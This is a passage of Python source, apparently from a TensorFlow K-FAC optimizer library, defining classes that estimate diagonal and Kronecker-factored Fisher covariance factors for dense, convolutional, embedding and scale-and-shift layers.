sum_{i} diag(inputs[i,:] ** 2). For sparse inputs, one of the most common use cases is the sparse input to an embedding layer. Given tensor = [batch_size, input_size] representing indices into an [vocab_size, embedding_size] embedding matrix, the diagonal covariance matrix is Cov(inputs, inputs) = (1/batch_size) sum_{i} diag(n_hot(inputs[i]) ** 2). where inputs[i] is the ith list of input ids, n_hot() constructs an n-hot binary vector and diag() constructs a diagonal matrix of size [vocab_size, vocab_size]. """ def __init__(self, tensors, has_bias=False, dtype=None): """Instantiate DiagonalKroneckerFactor. Args: tensors: List of list of Tensors, each of shape [batch_size, n]. First index is source, second index is tower. Two types of tensors are supported. Dense tensors are typically either a layer's inputs or its output's gradients. Sparse tensors are typically indices into an [vocab_size, embedding_dim] embedding matrix. Sparse tensors must have a property named "one_hot_depth" indicating the depth of one-hot tensors they should be converted to. dtype: dtype for covariance statistics. Only used for sparse inputs. Must be a floating point type. Defaults to float32. has_bias: bool. If True, append '1' to each input. """ self._tensors = tensors dtype = dtype or tf.float32 self._has_bias = has_bias self._one_hot_depth = getattr(self._tensors[0][0], "one_hot_depth", None) if self._one_hot_depth is None: self._dense_input = True self._cov_dtype = self._tensors[0][0].dtype else: self._dense_input = False self._cov_dtype = dtype super(DiagonalKroneckerFactor, self).__init__() @property def _var_scope(self): return "ff_diag_kron_" + scope_string_from_params( nest.flatten(self._tensors)) @property def _cov_shape(self): if self._dense_input: size = self._tensors[0][0].shape[1] + self._has_bias else: size = self._one_hot_depth + self._has_bias return [size] @property def _num_sources(self): return len(self._tensors) @property def _num_towers(self): return len(self._tensors[0]) @property def _dtype(self): return self._cov_dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._tensors[source][tower])[0] def _compute_new_cov(self, source, tower): tensor = self._tensors[source][tower] if len(tensor.shape) > 2: raise ValueError( "Input tensors to DiagonalKroneckerFactor must have rank <= 2. " "Found tensor with wrong rank: {}".format(tensor)) batch_size = utils.get_shape(tensor)[0] if self._dense_input: new_cov = tf.square(tensor) else: # Transform indices into one-hot vectors. # # TODO(b/72714822): There must be a faster way to construct the diagonal # covariance matrix! This operation is O(batch_size * vocab_size), where # it should be O(batch_size * input_size). flat_input_ids = tf.reshape(tensor, [-1]) new_cov = tf.one_hot(flat_input_ids, self._one_hot_depth) # [?, vocab_size] # Take average across examples. Note that, because all entries have # magnitude zero or one, there's no need to square the entries. # # TODO(b/72714822): Support for SparseTensor, other kinds of aggregation # within an example such as average. # # TODO(b/72714822): Support for partitioned embeddings. new_cov = tf.reduce_sum(new_cov, axis=0) new_cov /= tf.cast(batch_size, new_cov.dtype) if self._has_bias: new_cov = append_homog(new_cov) return new_cov def _get_data_device(self, tower): return self._tensors[0][tower].device class DiagonalMultiKF(DiagonalKroneckerFactor): def __init__(self, tensors, num_uses, has_bias=False, dtype=None): super(DiagonalMultiKF, self).__init__( tensors, dtype=dtype, has_bias=has_bias) self._num_uses = num_uses def _partial_batch_size(self, source=0, tower=0): # Note that some internal comptutations of "batch_size" done in the parent # class won't actually be the proper batch size. Instead, they will be # just "the thing to normalize the statistics by", essentially. This is okay # as we don't mix the two things up. return (super(DiagonalMultiKF, self)._partial_batch_size(source=source, tower=tower) // self._num_uses) class FullyConnectedDiagonalFactor(DiagonalFactor): r"""FisherFactor for a diagonal approx of a fully-connected layer's Fisher. Given in = [batch_size, input_size] and out_grad = [batch_size, output_size], approximates the covariance as, Cov(in, out) = (1/batch_size) sum_{i} outer(in[i], out_grad[i]) ** 2.0 where the square is taken element-wise. """ def __init__(self, inputs, outputs_grads, has_bias=False): """Instantiate FullyConnectedDiagonalFactor. Args: inputs: List of Tensors of shape [batch_size, input_size]. Inputs to this layer. List index is towers. outputs_grads: List of Tensors, each of shape [batch_size, output_size], which are the gradients of the loss with respect to the layer's outputs. First index is source, second is tower. has_bias: bool. If True, append '1' to each input. """ self._inputs = inputs self._has_bias = has_bias self._outputs_grads = outputs_grads self._squared_inputs = None super(FullyConnectedDiagonalFactor, self).__init__() @property def _var_scope(self): return "ff_diagfc_" + scope_string_from_params( tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads))) @property def _cov_shape(self): input_size = self._inputs[0].shape[1] + self._has_bias output_size = self._outputs_grads[0][0].shape[1] return [input_size, output_size] @property def _num_sources(self): return len(self._outputs_grads) @property def _num_towers(self): return len(self._inputs) @property def _dtype(self): return self._outputs_grads[0][0].dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._outputs_grads[source][tower])[0] def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True): self._squared_inputs = [] for tower in range(self._num_towers): inputs = self._inputs[tower] with maybe_place_on_device(self._get_data_device(tower)): if self._has_bias: inputs = append_homog(inputs) self._squared_inputs.append(tf.square(inputs)) return super(FullyConnectedDiagonalFactor, self).make_covariance_update_op( ema_decay, ema_weight, should_write=should_write) def _compute_new_cov(self, source, tower): batch_size = utils.get_shape(self._squared_inputs[tower])[0] outputs_grad = self._outputs_grads[source][tower] # The well-known special formula that uses the fact that the entry-wise # square of an outer product is the outer-product of the entry-wise squares. # The gradient is the outer product of the input and the output gradients, # so we just square both and then take their outer-product. new_cov = tf.matmul( self._squared_inputs[tower], tf.square(outputs_grad), transpose_a=True) new_cov /= tf.cast(batch_size, new_cov.dtype) return new_cov def _get_data_device(self, tower): return self._inputs[tower].device @six.add_metaclass(abc.ABCMeta) class ScaleAndShiftFactor(FisherFactor): def __init__(self, inputs, outputs_grads, broadcast_dim, has_shift=True, approx="full"): assert approx == "full" or approx == "diagonal" self._inputs = inputs self._outputs_grads = outputs_grads self._broadcast_dim = broadcast_dim self._has_shift = has_shift self._approx = approx super(ScaleAndShiftFactor, self).__init__() @property def _var_scope(self): return "ff_scaleshift_" + scope_string_from_params( [self._inputs, self._outputs_grads, self._broadcast_dim, self._has_shift, self._approx]) @property def _cov_shape(self): size = np.prod(self._inputs[0].shape[self._broadcast_dim:]) if self._has_shift: size *= 2 if self._approx == "full": return (size, size) elif self._approx == "diagonal": return (size,) @property def _num_sources(self): return len(self._outputs_grads) @property def _num_towers(self): return len(self._inputs) @property def _dtype(self): return self._inputs[0].dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._outputs_grads[source][tower])[0] def _compute_new_cov(self, source, tower): # Here we implement a "sum of squares" estimator that uses the special # structure of the scale & shift operation. In particular, we sum across # all dimensions that broadcast, then square (or take outer-products), and # then average across the mini-batch. inputs = self._inputs[tower] outputs_grad = self._outputs_grads[source][tower] batch_size = utils.get_shape(inputs)[0] assert len(inputs.shape) == len(outputs_grad.shape) for i in range(1, len(inputs.shape)): assert inputs.shape[i] <= outputs_grad.shape[i] # The formula for the gradient of the shift param is just the element-wise # product of the inputs and the output gradients, summed across the # dimensions that get broadcasted. scale_grads = tf.reduce_sum(inputs * outputs_grad, axis=list(range(1, self._broadcast_dim))) scale_grads_flat = tf.reshape(scale_grads, [batch_size, -1]) if self._has_shift: # The formula for the gradient of the shift param is just the output # gradients, summed across the dimensions that get broadcasted. shift_grads = tf.reduce_sum(outputs_grad, axis=list(range(1, self._broadcast_dim))) shift_grads_flat = tf.reshape(shift_grads, [batch_size, -1]) params_grads_flat = tf.concat([scale_grads_flat, shift_grads_flat], axis=1) else: params_grads_flat = scale_grads_flat if self._approx == "full": new_cov = compute_cov(params_grads_flat) elif self._approx == "diagonal": new_cov = tf.reduce_mean(tf.square(params_grads_flat), axis=0) return new_cov def _get_data_device(self, tower): return self._inputs[tower].device class ScaleAndShiftFullFactor(ScaleAndShiftFactor, DenseSquareMatrixFactor): def __init__(self, inputs, outputs_grads, broadcast_dim, has_shift=True): super(ScaleAndShiftFullFactor, self).__init__(inputs, outputs_grads, broadcast_dim, has_shift=has_shift, approx="full") class ScaleAndShiftDiagonalFactor(ScaleAndShiftFactor, DiagonalFactor): def __init__(self, inputs, outputs_grads, broadcast_dim, has_shift=True): super(ScaleAndShiftDiagonalFactor, self).__init__(inputs, outputs_grads, broadcast_dim, has_shift=has_shift, approx="diagonal") class ConvDiagonalFactor(DiagonalFactor): """FisherFactor for a diagonal approx of a convolutional layer's Fisher.""" def __init__(self, inputs, outputs_grads, filter_shape, strides, padding, data_format=None, dilations=None, has_bias=False, patch_mask=None): """Creates a ConvDiagonalFactor object. Args: inputs: List of Tensors of shape [batch_size, height, width, in_channels]. Input activations to this layer. List index is towers. outputs_grads: List of Tensors, each of shape [batch_size, height, width, out_channels], which are the gradients of the loss with respect to the layer's outputs. First index is source, second index is tower. filter_shape: Tuple of 4 ints: (kernel_height, kernel_width, in_channels, out_channels). Represents shape of kernel used in this layer. strides: The stride size in this layer (1-D Tensor of length 4). padding: The padding in this layer (1-D of Tensor length 4). data_format: None or str. Format of conv2d inputs. dilations: None or tuple of 4 ints. has_bias: Python bool. If True, the layer is assumed to have a bias parameter in addition to its filter parameter. patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels] or None. If not None this is multiplied against the extracted patches Tensor (broadcasting along the batch dimension) before statistics are computed. (Default: None) Raises: ValueError: If inputs, output_grads, and filter_shape do not agree on in_channels or out_channels. ValueError: If strides, dilations are not length-4 lists of ints. ValueError: If data_format does not put channel last. """ if not utils.is_data_format_channel_last(data_format): raise ValueError("Channel must be last.") if any(input_.shape.ndims != 4 for input_ in inputs): raise ValueError("inputs must be a list of 4-D Tensors.") if any(input_.shape.as_list()[-1] != filter_shape[-2] for input_ in inputs): raise ValueError("inputs and filter_shape must agree on in_channels.") for i, outputs_grad in enumerate(outputs_grads): if any(output_grad.shape.ndims != 4 for output_grad in outputs_grad): raise ValueError("outputs[%d] must be 4-D Tensor." % i) if any(output_grad.shape.as_list()[-1] != filter_shape[-1] for output_grad in outputs_grad): raise ValueError( "outputs[%d] and filter_shape must agree on out_channels." % i) if len(strides) != 4: raise ValueError("strides must be length-4 list of ints.") if dilations is not None and len(dilations) != 4: raise ValueError("dilations must be length-4 list of ints.") self._inputs = inputs self._outputs_grads = outputs_grads self._filter_shape = filter_shape self._strides = strides self._padding = padding self._data_format = data_format self._dilations = dilations self._has_bias = has_bias self._patches = None self._patch_mask = patch_mask super(ConvDiagonalFactor, self).__init__() @property def _var_scope(self): return "ff_convdiag_" + scope_string_from_params( tuple(self._inputs) + tuple(nest.flatten(self._outputs_grads))) @property def _cov_shape(self): filter_height, filter_width, in_channels, out_channels = self._filter_shape return [ filter_height * filter_width * in_channels + self._has_bias, out_channels ] @property def _num_sources(self): return len(self._outputs_grads) @property def _num_towers(self): return len(self._inputs) @property def _dtype(self): return self._inputs[0].dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._outputs_grads[source][tower])[0] def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True): filter_height, filter_width, _, _ = self._filter_shape # TODO(b/64144716): there is potential here for a big savings in terms # of memory use. if self._dilations is None: rates = (1, 1, 1, 1) else: rates = tuple(self._dilations) self._patches = [] for tower in range(self._num_towers): with maybe_place_on_device(self._get_data_device(tower)): patches = tf.extract_image_patches( self._inputs[tower], ksizes=[1, filter_height, filter_width, 1], strides=self._strides, rates=rates, padding=self._padding) if self._patch_mask is not None: assert self._patch_mask.shape == self._filter_shape[0:-1] # This should work as intended due to broadcasting. patches *= self._patch_mask if self._has_bias: patches = append_homog(patches) self._patches.append(patches) return super(ConvDiagonalFactor, self).make_covariance_update_op( ema_decay, ema_weight, should_write=should_write) def _compute_new_cov(self, source, tower): patches = self._patches[tower] batch_size = utils.get_shape(patches)[0] outputs_grad = self._outputs_grads[source][tower] new_cov = self._convdiag_sum_of_squares(patches, outputs_grad) new_cov /= tf.cast(batch_size, new_cov.dtype) return new_cov def _convdiag_sum_of_squares(self, patches, outputs_grad): # This computes the sum of the squares of the per-training-case "gradients". # It does this simply by computing a giant tensor containing all of these, # doing an entry-wise square, and them summing along the batch dimension. case_wise_gradients = tf.einsum("bijk,bijl->bkl", patches, outputs_grad) return tf.reduce_sum(tf.square(case_wise_gradients), axis=0) def _get_data_device(self, tower): return self._inputs[tower].device class FullyConnectedKroneckerFactor(DenseSquareMatrixFactor): """Kronecker factor for the input or output side of a fully-connected layer. """ def __init__(self, tensors, has_bias=False): """Instantiate FullyConnectedKroneckerFactor. Args: tensors: List of list of Tensors, each of shape [batch_size, n]. The Tensors are typically either a layer's inputs or its output's gradients. The first list index is source, the second is tower. has_bias: bool. If True, append '1' to each row. """ # The tensor argument is either a tensor of input activations or a tensor of # output pre-activation gradients. self._has_bias = has_bias self._tensors = tensors super(FullyConnectedKroneckerFactor, self).__init__() @property def _var_scope(self): return "ff_fckron_" + scope_string_from_params( tuple(nest.flatten(self._tensors)) + (self._has_bias,)) @property def _cov_shape(self): size = self._tensors[0][0].shape[1] + self._has_bias return [size, size] @property def _num_sources(self): return len(self._tensors) @property def _num_towers(self): return len(self._tensors[0]) @property def _dtype(self): return self._tensors[0][0].dtype def _partial_batch_size(self, source=0, tower=0): return utils.get_shape(self._tensors[source][tower])[0] def _compute_new_cov(self, source, tower): tensor = self._tensors[source][tower] if self._has_bias: tensor = append_homog(tensor) return compute_cov(tensor) def _get_data_device(self, tower): return self._tensors[0][tower].device class ConvInputKroneckerFactor(DenseSquareMatrixFactor): r"""Kronecker factor for the input side of a convolutional layer. Estimates E[ a a^T ] where a is the inputs to a convolutional layer given example x. Expectation is taken over all examples and locations. Equivalent to Omega in https://arxiv.org/abs/1602.01407 for details. See Section 3.1 Estimating the factors. """ def __init__(self, inputs, filter_shape, padding, strides=None, dilation_rate=None, data_format=None, extract_patches_fn=None, has_bias=False, sub_sample_inputs=None, sub_sample_patches=None, patch_mask=None): """Initializes ConvInputKroneckerFactor. Args: inputs: List of Tensors of shape [batch_size, ..spatial_input_size.., in_channels]. Inputs to layer. List index is tower. filter_shape: List of ints. Contains [..spatial_filter_size.., in_channels, out_channels]. Shape of convolution kernel. padding: str. Padding method for layer. "SAME" or "VALID". strides: List of ints or None. Contains [..spatial_filter_strides..] if 'extract_patches_fn' is compatible with tf.nn.convolution(), else [1, ..spatial_filter_strides, 1]. dilation_rate: List of ints or None. Rate for dilation along each spatial dimension if 'extract_patches_fn' is compatible with tf.nn.convolution(), else [1, ..spatial_dilation_rates.., 1]. data_format: str or None. Format of input data. extract_patches_fn: str or None. Name of function that extracts image patches. One of "extract_convolution_patches", "extract_image_patches", "extract_pointwise_conv2d_patches". has_bias: bool. If True, append 1 to in_channel. sub_sample_inputs: `bool`. If True, then subsample the inputs from which the image patches are extracted. (Default: None) sub_sample_patches: `bool`, If `True` then subsample the extracted patches. (Default: None) patch_mask: Tensor of shape [kernel_height, kernel_width, in_channels] or None. If not None this is multiplied against the extracted patches Tensor (broadcasting along the batch dimension) before statistics are computed. (Default: None) """ self._inputs = inputs self._filter_shape = filter_shape self._strides = strides self._padding = padding self._dilation_rate = dilation_rate self._data_format = data_format self._extract_patches_fn = extract_patches_fn self._has_bias = has_bias if sub_sample_inputs is None: self._sub_sample_inputs = _SUB_SAMPLE_INPUTS else: self._sub_sample_inputs = sub_sample_inputs if sub_sample_patches is None: self._sub_sample_patches = _SUB_SAMPLE_PATCHES else: self._sub_sample_patches = sub_sample_patches self._patch_mask = patch_mask super(ConvInputKroneckerFactor, self).__init__() @property def _var_scope(self): return "ff_convinkron_" + scope_string_from_params( tuple(self._inputs) + tuple((self._filter_shape, self._strides, self._padding, self._dilation_rate, self._data_format, self._has_bias, self._patch_mask))) @property def _cov_shape(self): spatial_filter_shape = self._filter_shape[0:-2] in_channels = self._filter_shape[-2] size = np.prod(spatial_filter_shape) * in_channels + self._has_bias return [size, size] @property def _num_sources(self): return 1 @property def _num_towers(self): return len(self._inputs) @property def _dtype(self): return self._inputs[0].dtype def _partial_batch_size(self, source=0, tower=0): assert source == 0 return utils.get_shape(self._inputs[tower])[0] def _compute_new_cov(self, source, tower): assert source == 0 inputs = self._inputs[tower] if self._sub_sample_inputs: batch_size = utils.get_shape(inputs)[0] # computes: int(math.ceil(batch_size * _INPUTS_TO_EXTRACT_PATCHES_FACTOR)) new_size = tf.cast( tf.ceil(tf.multiply(tf.cast(batch_size, dtype=tf.float32), _INPUTS_TO_EXTRACT_PATCHES_FACTOR)), dtype=tf.int32) inputs = _random_tensor_gather(inputs, new_size) # TODO(b/64144716): there is potential here for a big savings in terms of # memory use. if self._extract_patches_fn in [None, "extract_convolution_patches"]: patches = utils.extract_convolution_patches( inputs, self._filter_shape, padding=self._padding, strides=self._strides, dilation_rate=self._dilation_rate, data_format=self._data_format) elif self._extract_patches_fn == "extract_image_patches": assert inputs.shape.ndims == 4 assert len(self._filter_shape) == 4 assert len(self._strides) == 4, self._strides if self._dilation_rate is None: rates = [1, 1, 1, 1] else: rates = self._dilation_rate assert len(rates) == 4 assert rates[0] == rates[-1] == 1 patches = tf.extract_image_patches( inputs, ksizes=[1] + list(self._filter_shape[0:-2]) + [1], strides=self._strides, rates=rates, padding=self._padding) elif self._extract_patches_fn == "extract_pointwise_conv2d_patches": assert self._strides in [None, [1, 1, 1, 1], (1, 1, 1, 1)] assert self._filter_shape[0] == self._filter_shape[1] == 1 patches = utils.extract_pointwise_conv2d_patches( inputs, self._filter_shape, data_format=None) else: raise NotImplementedError(self._extract_patches_fn) if self._patch_mask is not None: assert self._patch_mask.shape == self._filter_shape[0:-1] # This should work as intended due to broadcasting. patches *= tf.reshape(self._patch_mask, [-1]) flatten_size = np.prod(self._filter_shape[0:-1]) # patches_flat below is the matrix [[A_l]] from the KFC paper (tilde # omitted over A for clarity). It has shape M|T| x J|Delta| (eq. 14), # where M = minibatch size, |T| = number of spatial locations, # |Delta| = number of spatial offsets, and J = number of input maps # for convolutional layer l. patches_flat = tf.reshape(patches, [-1, flatten_size]) # We append a homogenous coordinate to patches_flat if the layer has # bias parameters. This gives us [[A_l]]_H from the paper. if self._sub_sample_patches: patches_flat = _subsample_patches(patches_flat) if self._has_bias: patches_flat = append_homog(patches_flat) # We call compute_cov without passing in a normalizer. compute_cov uses # the first dimension of patches_flat i.e. M|T| as the normalizer by # default. Hence we end up computing 1/M|T| * [[A_l]]^T [[A_l]], with # shape J|Delta| x J|Delta|. This is related to hat{Omega}_l from # the paper but has a different scale here for consistency with # ConvOutputKroneckerFactor. # (Tilde omitted over A for clarity.) return compute_cov(patches_flat) def _get_data_device(self, tower): return self._inputs[tower].device class ConvInputMultiKF(ConvInputKroneckerFactor): def __init__(self, inputs, filter_shape, padding, num_uses, strides=None, dilation_rate=None, data_format=None, extract_patches_fn=None, has_bias=False, sub_sample_inputs=None, sub_sample_patches=None, patch_mask=None): super(ConvInputMultiKF, self).__init__(self, inputs, filter_shape, padding, strides=strides, dilation_rate=dilation_rate, data_format=data_format, extract_patches_fn=extract_patches_fn, has_bias=has_bias, sub_sample_inputs=sub_sample_inputs, sub_sample_patches=sub_sample_patches, patch_mask=patch_mask) self._num_uses = num_uses def _partial_batch_size(self, source=0, tower=0): # Note that some internal comptutations of "batch_size" done in the parent # class won't actually be the proper batch size. Instead, they will be # just "the thing to normalize the statistics by", essentially. This is okay # as we don't mix the two things up. return (super(ConvInputMultiKF, self)._partial_batch_size(source=source, tower=tower) // self._num_uses) class ConvInputSUAKroneckerFactor(FisherFactor): r"""Kronecker factor for the input side of a convolutional layer. Assumes activations across locations are uncorrelated. Check section 4.2 Theorem 4 in https://arxiv.org/pdf/1602.01407.pdf for further details on the assumptions. This is a computationally more efficient approximation, especially for very wide layers. """ def __init__(self, inputs, filter_shape, has_bias=False): """Initializes ConvInputSUAKroneckerFactor. If `ASSUME_ZERO_MEAN_ACTIVATIONS` is `True` then assumes activations zero mean and the contribution from `M(j) M(j')` term in Theorem 4 from https://arxiv.org/pdf/1602.01407.pdf is ignored. Args: inputs: List of Tensors of shape [batch_size, ..spatial_input_size.., in_channels]. Inputs to layer. List index is tower. filter_shape: List of ints. Contains [..spatial_filter_size.., in_channels, out_channels]. Shape of convolution kernel. has_bias: bool. If True, appends 1 to mean activations. """ self._inputs = inputs self._filter_shape = filter_shape self._has_bias = has_bias self._kw_kh = np.prod(self._filter_shape[0:-2]) self._in_channels = self._filter_shape[-2] self._matpower_by_exp_and_damping = OrderedDict() # { (float, hashable): variable } self._matpower_registrations = set() # { (float, hashable) } self._damping_funcs_by_id = OrderedDict() # {hashable: lambda} self._damping_var_by_id = OrderedDict() if not ASSUME_ZERO_MEAN_ACTIVATIONS: self._cov_inv_mu_by_damping_id = OrderedDict() self._rank_one_update_scale_by_damping_id = OrderedDict() super(ConvInputSUAKroneckerFactor, self).__init__() @property def _var_scope(self): return "ff_convinsuakron_" + scope_string_from_params( tuple(self._inputs) + tuple((self._filter_shape, self._has_bias))) @property def _cov_shape(self): """Returns a list with value [in_channels, in_channels]. NOTE: This does not return the shape of the full cov matrix. But returns the shape of the matrix which computes the covariance of the input channel activations under the assumption mentioned in Theorem 4 in https://arxiv.org/pdf/1602.01407.pdf. This does not include bias dimension and also includes only the `Sigma` term from Theorem 4 in the paper. """ return [self._in_channels, self._in_channels] @property def _num_sources(self): return 1 @property def _num_towers(self): return len(self._inputs) @property def _dtype(self): return self._inputs[0].dtype @property def mu(self): return self._mu.value def _partial_batch_size(self, source=0, tower=0): assert source == 0 return utils.get_shape(self._inputs[tower])[0] def _register_damping(self, damping_func): damping_id = graph_func_to_id(damping_func) if damping_id not in self._damping_funcs_by_id: self._damping_funcs_by_id[damping_id] = damping_func return damping_id def get_inv_vars(self): inv_vars = [] inv_vars.extend(self._matpower_by_exp_and_damping.values()) return inv_vars def instantiate_cov_variables(self): """Makes the internal cov variable(s).""" super(ConvInputSUAKroneckerFactor, self).instantiate_cov_variables() # Create variables for computing the mean activations only if # `ASSUME_ZERO_MEAN_ACTIVATIONS` is set to `False`. Otherwise the # contribution from the second term in equation 35 in the paper # https://arxiv.org/pdf/1602.01407.pdf is ignored. if not ASSUME_ZERO_MEAN_ACTIVATIONS: with tf.variable_scope(self._var_scope): self._mu = utils.MovingAverageVariable( name="mu", shape=(self._in_channels, 1), # number of input channels. dtype=self._dtype, initializer=tf.zeros_initializer(), normalize_value=ZERO_DEBIAS) self._acc_mu = utils.AccumulatorVariable( name="acc_mu", shape=(self._in_channels, 1), dtype=self._dtype) def make_covariance_update_op(self, ema_decay, ema_weight, should_write=True): """Constructs and returns the covariance update Op. Args: ema_decay: The exponential moving average decay (float or Tensor). ema_weight: float or Tensor. The weight to put on the newly computed values. This is typically 1.0 - ema_decay. should_write: Python or TF bool. If True, we write the covariance to the variable and reset the accumulator instead of just accumulating. (Default: True) Returns: An Op for updating the covariance Variable referenced by _cov and possibly updating mean activations. """ # The newly computed cov matrix is returned and assigned below to the # moving average. `new_cov` is required to compute mean activations. # Mean activations is given by last row and col of `new_cov. # Remove the last row and col from `new_cov`. new_cov = super(ConvInputSUAKroneckerFactor, self)._compute_total_new_cov() new_mu = new_cov[:-1, -1:] new_cov = new_cov[0:-1, 0:-1] if not ASSUME_ZERO_MEAN_ACTIVATIONS: new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True) acc_mu_op = accumulate_and_maybe_write(self._acc_mu, self._mu, new_mu, ema_decay, ema_weight, should_write) else: acc_mu_op = tf.no_op() if SUBTRACT_MEAN_CONTRIB_FROM_COV: new_cov = new_cov - tf.matmul(new_mu, new_mu, transpose_b=True) acc_cov_op = accumulate_and_maybe_write(self._acc_cov, self._cov, new_cov, ema_decay, ema_weight, should_write) return tf.group(acc_cov_op, acc_mu_op) def _compute_new_cov(self, source, tower): assert source == 0 inputs = self._inputs[tower] # Reshape inputs to compute [in_channels, in_channels] shape cov. channel_inputs = tf.reshape(inputs, shape=(-1, self._in_channels)) # Append the bias dimension as we need this to calculate mean activations. channel_inputs = append_homog(channel_inputs) return compute_cov(channel_inputs) def register_matpower(self, exp, damping_func): """Registers a matrix power to be maintained and served on demand. This creates a variable and signals make_inverse_update_ops to make the corresponding update op. The variable can be read via the method get_matpower. Args: exp: float. The exponent to use in the matrix power. damping_func: A function that computes a 0-D Tensor or a float which will be the damping value used. i.e. damping = damping_func(). """ if exp == 1.0: return if exp != -1: raise ValueError("ConvInputSUAKroneckerFactor supports only" "matrix inversion") damping_id = self._register_damping(damping_func) if (exp, damping_id) not in self._matpower_registrations: self._matpower_registrations.add((exp, damping_id)) def _compute_sm_rank_one_update_quants(self, exp, damping_id, damping_value): """Returns tensors to compute Fisher inv using Sherman-Morrison formula.""" cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)] cov_inv_mu = tf.matmul(cov_inv, self.mu) hatmu_t_cov_inv_hatmu = self._kw_kh * tf.squeeze( tf.matmul(self.mu, cov_inv_mu, transpose_a=True)) if self._has_bias: tildemu_t_cov_inv_tildemu = hatmu_t_cov_inv_hatmu + (1. / damping_value) return cov_inv_mu, (1. / (1. + tildemu_t_cov_inv_tildemu)) else: return cov_inv_mu, (1. / (1. + hatmu_t_cov_inv_hatmu)) def get_matpower(self, exp, damping_func): # Note that this function returns a variable which gets updated by the # inverse ops. It may be stale / inconsistent with the latest value of # self.cov (except when exp == 1). if exp == 1: return self._make_cov_linear_operator( damping=tf.cast(damping_func(), dtype=self._dtype)) elif exp == -1: damping_id = graph_func_to_id(damping_func) cov_inv = self._matpower_by_exp_and_damping[(exp, damping_id)] damping_value = self._damping_var_by_id[damping_id] # Replicates the in_channels * in_channels cov inverse matrix. # Note that in this function the replications are not done explicitly. # They are done using tf.linalg ops and hence they are computationally # efficient. quant_1 = tf.linalg.LinearOperatorKronecker([ tf.linalg.LinearOperatorFullMatrix( cov_inv, is_non_singular=True, is_self_adjoint=True, is_positive_definite=True, is_square=True), tf.linalg.LinearOperatorIdentity( num_rows=self._kw_kh, dtype=self._dtype) ]) # If a bias dimension needs to be appended then we need to expand # scaled_cov_inv_mu and assign `1` to the last dimension. Also # we need to append inverse of damping constant (1 * 1 matrix) to # to the replicated cov inverse matrix. if self._has_bias: bias_operator = tf.linalg.LinearOperatorFullMatrix( [[1. / damping_value]], is_non_singular=True, is_self_adjoint=True, is_positive_definite=True, is_square=True) cov_inv_kron_identity_operator = tf.linalg.LinearOperatorBlockDiag( [quant_1, bias_operator]) if not ASSUME_ZERO_MEAN_ACTIVATIONS: cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id] scale = self._rank_one_update_scale_by_damping_id[damping_id] # Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last # dim and then reshape. mean_update = ( tf.expand_dims( append_homog( tf.reshape(tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1,)), homog_value=(1. / damping_value)), axis=1)) else: cov_inv_kron_identity_operator = quant_1 if not ASSUME_ZERO_MEAN_ACTIVATIONS: cov_inv_mu = self._cov_inv_mu_by_damping_id[damping_id] scale = self._rank_one_update_scale_by_damping_id[damping_id] # Compute cov_inv_mu kron 1's vec. We tile the cov_inv_mu on the last # dim and then reshape. mean_update = tf.reshape( tf.tile(cov_inv_mu, [1, self._kw_kh]), (-1, 1)) if ASSUME_ZERO_MEAN_ACTIVATIONS: return cov_inv_kron_identity_operator else: # To include the contribution from the mean activations we need to # low rank update op. Note the Sherman Morrison formula requires # negative of (mean_update * mean_update^T) / scale term to be added. # In order to achieve this using `LinearOperatorLowRankUpdate` set `v` # to negative of mean update vector multiplied by scale. return tf.linalg.LinearOperatorLowRankUpdate( cov_inv_kron_identity_operator, mean_update, v=-scale * mean_update, is_non_singular=True, is_self_adjoint=True, is_positive_definite=True, is_square=True) else: raise ValueError("ConvInputSUAKroneckerFactor only supports" "computing inverse of cov matrix.") def make_inverse_update_ops(self): """Creates and return update ops for registered computations.""" inverse_ops = [] for (exp, damping_id), matpower in self._matpower_by_exp_and_damping.items(): assert exp == -1 damping = tf.cast(self._damping_funcs_by_id[damping_id](), self._dtype) damping_assign_op = utils.smart_assign( self._damping_var_by_id[damping_id], damping) inverse_op = utils.smart_assign(matpower, utils.posdef_inv(self.cov, damping)) inverse_ops.append(damping_assign_op) if not ASSUME_ZERO_MEAN_ACTIVATIONS: with tf.control_dependencies([inverse_op]): (cov_inv_mu, rank_one_update_scale) = self._compute_sm_rank_one_update_quants( exp, damping_id, damping) inverse_ops.append( utils.smart_assign(self._cov_inv_mu_by_damping_id[damping_id], cov_inv_mu)) inverse_ops.append( utils.smart_assign( self._rank_one_update_scale_by_damping_id[damping_id], rank_one_update_scale)) else: inverse_ops.append(inverse_op) return inverse_ops def get_inverse(self, damping_func): # Just for backwards compatibility of some old code and tests return self.get_matpower(-1, damping_func) def instantiate_inv_variables(self): """Makes the internal "inverse" variable(s).""" for (exp, damping_id) in self._matpower_registrations: if exp != -1.: raise ValueError("ConvInputSUAKroneckerFactor only supports inverse" "computation") exp_string = scalar_or_tensor_to_string(exp) damping_func = self._damping_funcs_by_id[damping_id] damping_string = graph_func_to_string(damping_func) with tf.variable_scope(self._var_scope): matpower = tf.get_variable( "matpower_exp{}_damp{}".format(exp_string, damping_string), initializer=inverse_initializer, shape=self._cov_shape, trainable=False, dtype=self._dtype, use_resource=True) assert (exp, damping_id) not in self._matpower_by_exp_and_damping self._matpower_by_exp_and_damping[(exp, damping_id)] = matpower self._damping_var_by_id[damping_id] = tf.get_variable( "damping_var_{}_{}".format(exp_string, damping_string), initializer=tf.zeros_initializer(), shape=(), trainable=False, dtype=self._dtype, use_resource=True) if not ASSUME_ZERO_MEAN_ACTIVATIONS: self._cov_inv_mu_by_damping_id[damping_id] = tf.get_variable( "cov_inv_mu_{}_{}".format(exp_string, damping_string), initializer=tf.zeros_initializer(), shape=(self._in_channels, 1), trainable=False, dtype=self._dtype, use_resource=True) self._rank_one_update_scale_by_damping_id[damping_id] = tf.get_variable( "rank_one_update_scale_{}_{}".format(exp_string, damping_string), initializer=tf.zeros_initializer(), shape=(), trainable=False, dtype=self._dtype, use_resource=True) def _make_cov_linear_operator(self, damping=None): 